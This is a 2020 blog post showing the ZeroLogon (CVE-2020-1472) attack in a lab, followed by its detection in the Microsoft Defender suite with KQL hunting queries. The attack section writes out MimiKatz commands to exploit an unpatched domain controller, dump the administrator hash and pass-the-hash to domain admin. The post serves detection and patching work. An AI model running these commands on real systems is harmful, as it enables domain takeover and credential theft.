ZeroLogon detected by the Microsoft Defender suite

6 min readOct 5, 2020

CVE-2020–1472 (Netlogon Elevation of Privilege Vulnerability) is a critical (score 10/10) vulnerability which exploits the NetLogon Remote Protocol (MS-NRPC). The vulnerability is publicly known as ZeroLogon. 99% of all known attacks use one or more vulnerabilties and almost never zero-days.

A Microsoft patch was released August 2020 but since the release of the 1st PoC (Proof-of-Concept) by Tom Tervoort (Secura) on 11–09–2020, various Security researchers like Benjamin Delphy (MimiKatz), Dirkjan Mollema(Fox-IT) and the NCC Group created an easy-to-use tool to exploit the vulnerability. Since that moment Microsoft saw an extreme rise of exploits (via a silence detection in Microsoft Defender for Identity, internal use only).

The Attack

For the attack we use a Windows 10 computer, a non-patched Domain Controller and MimiKatz. Create an exclusion folder (Windows Defender) and download the latest release of MimiKatz.

The first step is to logon with user credentials on the Windows 10 computer and access the domain controller, the result is access denied (as it should be).

Let’s start MimiKatz (run as Administrator Command Prompt). The first command verifies if the domain controller is vulnerable to the ZeroLogon attack.

lsadump::Zerologon /target:<DC-FQDN> /account:<DC>$ /null /ntlm

The second command is to exploit the vulnerability.

lsadump::Zerologon /target:<DC-FQDN> /account:<DC>$ /null /ntlm /exploit

The third command is to dump the administrator NTLM hash

lsadump::dcsync /domain:<domain-fqdn> /dc:<DC> /user:administrator /authuser: <DC>$ /authdomain:<domain> /authpassword:”” /authntlm

The fourth and final command is to re-use the NTLM hash and create a session with domain admin credentials (domain dominance).

Privilege::debug
Sekurlsa::pth /user:administrator /domain:vuln /rc4:a87f3a337d73085c45f9416be5787d86

Let’s verify if we can access the domain controller, yes we can.

And we successfully exploited the ZeroLogon vulnerability.

Microsoft Defender for Identity

Microsoft Defender for Identity (previously Azure ATP) is the security product in the Defender suite to detect attacks on the Active Directory. The ZeroLogon attack is officially available since the 1st of October.

The attack (CVE-2020–1472 exploitation) is detected if Audit logging is enabled.

Details can be seen if the attack was successful and/or unsuccessful.

Microsoft Defender for Endpoint

Microsoft Defender for Endpoint (previously Microsoft Defender ATP) is the security product in the Defender suite to detect attacks on the devices via EDR (Endpoint Detection and Response) anomaly detection.

Microsoft Defender for Endpoint has two types of detections:
- Vulnerability Management (pro-active)
- Threat Detection (reactive)

Threat and Vulnerability Management

The Threat and Vulnerability Management (TVM) module detects vulnerabilities (Exposure level) in software; Microsoft, and non-Microsoft (3P).

The details of the exposure are the different CVE’s. The red bug icon displays if a public exploit is available (to prioritize the mitigation / patch process).

In the details of the CVE are e.g. release date, score, reference, etc. but also the required remediation steps (KB article with the patch).

Threat Detection

The Alerts and Incident (correlation of entity-related alerts) page shows the Risk Level of the device.

The Incident (correlation of 3 alerts) shows the attack on the endpoint via MimiKatz (even if the tool is downloaded in an excluded folder).

Microsoft 365 Defender

Microsoft 365 Defender (previously Microsoft Threat Protection) is the multi-source detection tool for the Modern Workplace (Microsoft 365 E5 Security license) on the asset’s identity, devices, apps & data.

Incidents

The cross-source Incident in Microsoft 365 Defender is a correlation of multiple incidents from the underlaying products.

The ZeroLogon attack is detected and the Incident is correlated from Microsoft Defender for Identity and Microsoft Defender for Endpoint.

Hunting

Advanced hunting is the second cross-source feature of Microsoft 365 Defender. In the hunting example below, the correlation logic behind-the-scenes is described from the ZeroLogon attack.

The first KQL query is used identity the process and network connection details from Microsoft Defender for Identity (Azure ATP) data on the source device which launched the ZeroLogon attack

// Find all Netlogon exploit attempt alerts containing source devices
let queryWindow = 3d;
AlertInfo
| where Timestamp > ago(queryWindow)
| where ServiceSource == “Azure ATP”
| where Title == “Suspected Netlogon privilege elevation attempt (CVE-2020–1472 exploitation)”
| join (AlertEvidence
| where Timestamp > ago(queryWindow)
| where EntityType == “Machine”
| where EvidenceDirection == “Source”
| where isnotempty(DeviceId)
) on AlertId
| summarize by AlertId, DeviceId, Timestamp

The output is the AlertID (required for the second query)

The second KQL query populates the AlertID into the NLAlertId in the next query to hunt for the process in the Microsoft Defender for Endpoint data that launched the ZeroLogon attack.

// Find potential endpoint Netlogon exploit evidence from AlertId
let NLAlertId = “aa6cef45fd-f3e9–4823–9753–60e14d844439”;
let lookAhead = 1m;
let lookBehind = 60m;
let NLEvidence = AlertEvidence
| where AlertId == NLAlertId
| where EntityType == “Machine”
| where EvidenceDirection == “Source”
| where isnotempty(DeviceId)
| summarize Timestamp=arg_min(Timestamp, *) by DeviceId;
let sourceMachine = NLEvidence | distinct DeviceId;
let alertTime = todatetime(toscalar(NLEvidence | distinct Timestamp));
DeviceNetworkEvents
| where Timestamp between ((alertTime — lookBehind) .. (alertTime + lookAhead))
| where DeviceId in (sourceMachine)
| where RemotePort == 135 or RemotePort between (49670 .. 49680)
| summarize (Timestamp, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessAccountSid)=arg_min(ReportId, Timestamp, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessAccountSid), TargetDevicePorts=make_set(RemotePort) by DeviceId, DeviceName, RemoteIP, RemoteUrl
| project-rename SourceComputerName=DeviceName, SourceDeviceId=DeviceId, TargetDeviceIP=RemoteIP, TargetComputerName=RemoteUrl

The output shows the correlation of the Microsoft Defender for Identity and the Microsoft Defender for Endpoint data to get a clear picture of the attack (timeline and method).

Source https://techcommunity.microsoft.com/t5/microsoft-365-defender/zerologon-is-now-detected-by-microsoft-defender-for-identity-cve/ba-p/1734034 (including correction of typo ZLEvidence in the link above, should be NLEvidence).

Summary

The different Microsoft Defender products discover the ZeroLogon attack in different stages of the attack. Microsoft Defender for Identity detects the attack on the Active Directory (domain dominance). Microsoft Defender for Endpoint detects the vulnerability via the TVM module (from initial release data to public exploit available) and the attack via the Threat module via the alert and incident page. Microsoft 365 Defender brings together all information to get a clear understanding of the attack via the correlated incidents. This is where you can see the true power of XDR (eXtended Detection and Response).

I hope this blog gives some insight in the advantages of the Microsoft Defender suite and the need to mitigate (update the systems) the CVE-2020–1472 as soon as possible.